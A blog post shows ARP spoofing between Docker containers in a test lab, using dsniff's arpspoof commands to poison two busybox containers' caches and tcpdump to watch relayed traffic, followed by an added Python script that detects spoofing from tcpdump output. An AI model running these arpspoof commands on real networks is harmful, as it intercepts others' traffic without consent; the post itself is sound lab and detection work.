Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old attack technique for intercepting traffic on switched or bridged networks. It works by poisoning the ARP cache that hosts use to look up the MAC address of a given neighbour, so frames meant for that neighbour are delivered to the attacker instead. Google searches will yield plenty of further reading on the topic.

This write-up simply validates whether the technique still works in containerized environments.

So let's create a test environment to prove the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easier:

docker-machine ssh spooftest

On terminal 1, build the required images (the CMD of the tcpdump image is `tcpdump -n -i eth0`; the interface name must follow `-i`)
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -n -i eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &

On terminal 4, launch a tcpdump in the network namespace of the arpspoofer container to verify that the ARP spoofing is taking place
docker run -it --name tcpdumper --net=container:arpspoofer tcpdump

Traffic should be relayed through the arpspoof container!
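The tcpdump terminal above is where the spoofing becomes visible: the arpspoof container keeps sending unsolicited ARP replies that announce its own MAC for both 172.17.0.4 and 172.17.0.5. The following script is an added example, not code from the original post, that turns that observation into a check a defender can run over tcpdump output from the bridge. It assumes the line format of `tcpdump -n -i eth0` (with or without `-e`), that the spoofing container received the next address on the default bridge (172.17.0.6 with MAC 02:42:ac:11:00:06; a constructed assumption for the sample), and that the victims keep the Docker-default bridge MACs, which are derived from the IPv4 address as `02:42` followed by the four octets in hex.

```python
#!/usr/bin/env python3
"""Flag ARP-spoofing symptoms in tcpdump output captured on a Docker bridge.

Added example (not from the original post). Two signals are checked:
  1. an IP address being announced with a MAC other than the one first
     seen (or the one a Docker default-bridge container would have), and
  2. one MAC address claiming several IP addresses, which is exactly what
     an arpspoof container relaying between two victims looks like.
"""
import re
from collections import defaultdict

# Matches the "Reply <ip> is-at <mac>" part that tcpdump prints for ARP
# replies both with and without -e; the timestamp is the first token.
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+).*?Reply\s+(?P<ip>\d+(?:\.\d+){3})\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed sample: one legitimate reply from box1, then the spoofer
# (assumed to be 172.17.0.6 / 02:42:ac:11:00:06) claiming both victims.
SAMPLE = """\
10:00:01.000100 ARP, Request who-has 172.17.0.4 tell 172.17.0.5, length 28
10:00:01.000200 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:04, length 28
10:00:03.000100 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:06, length 28
10:00:03.000200 ARP, Reply 172.17.0.5 is-at 02:42:ac:11:00:06, length 28
10:00:05.000100 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:06, length 28
"""


def parse_arp_replies(text):
    """Return a list of (timestamp, ip, mac) tuples for every ARP reply."""
    replies = []
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def expected_bridge_mac(ip):
    """MAC that Docker's default bridge assigns for an IPv4 address.

    Docker derives it as 02:42 followed by the address bytes, so this is a
    heuristic for the default bridge only; a custom --mac-address breaks it.
    """
    octets = [int(o) for o in ip.split(".")]
    return "02:42:" + ":".join(f"{o:02x}" for o in octets)


def detect_spoofing(text, baseline=None):
    """Return {"alerts": [...], "claims": {mac: set(ips)}} for tcpdump text.

    `baseline` may pre-seed the ip -> mac mapping from a known-good ARP
    table; it is never overwritten, so every conflicting reply alerts.
    """
    seen = dict(baseline or {})
    claims = defaultdict(set)
    alerts = []
    for ts, ip, mac in parse_arp_replies(text):
        claims[mac].add(ip)
        previous = seen.get(ip)
        if previous is None:
            seen[ip] = mac
            if mac != expected_bridge_mac(ip):
                alerts.append(
                    f"{ts} {ip} announced by {mac}, "
                    f"expected bridge MAC {expected_bridge_mac(ip)}"
                )
        elif previous != mac:
            alerts.append(f"{ts} {ip} moved from {previous} to {mac}")
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {sorted(ips)}")
    return {"alerts": alerts, "claims": dict(claims)}


if __name__ == "__main__":
    # Run it on the constructed sample; pipe real tcpdump output via stdin
    # instead, e.g. `docker logs tcpdumper | python3 arpcheck.py`.
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for alert in detect_spoofing(text)["alerts"]:
        print("ALERT:", alert)
```

On the sample this reports the two victim addresses moving to the spoofer's MAC and that MAC claiming both addresses; the same check run on the real tcpdumper output confirms the attack from the host side without looking inside box1 or box2.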

1 comment:

  1. Very interesting. (A few typos, and also tcpdump -n -i ...)
    I have an SELinux alert with tcpdump; do you have an easy solution?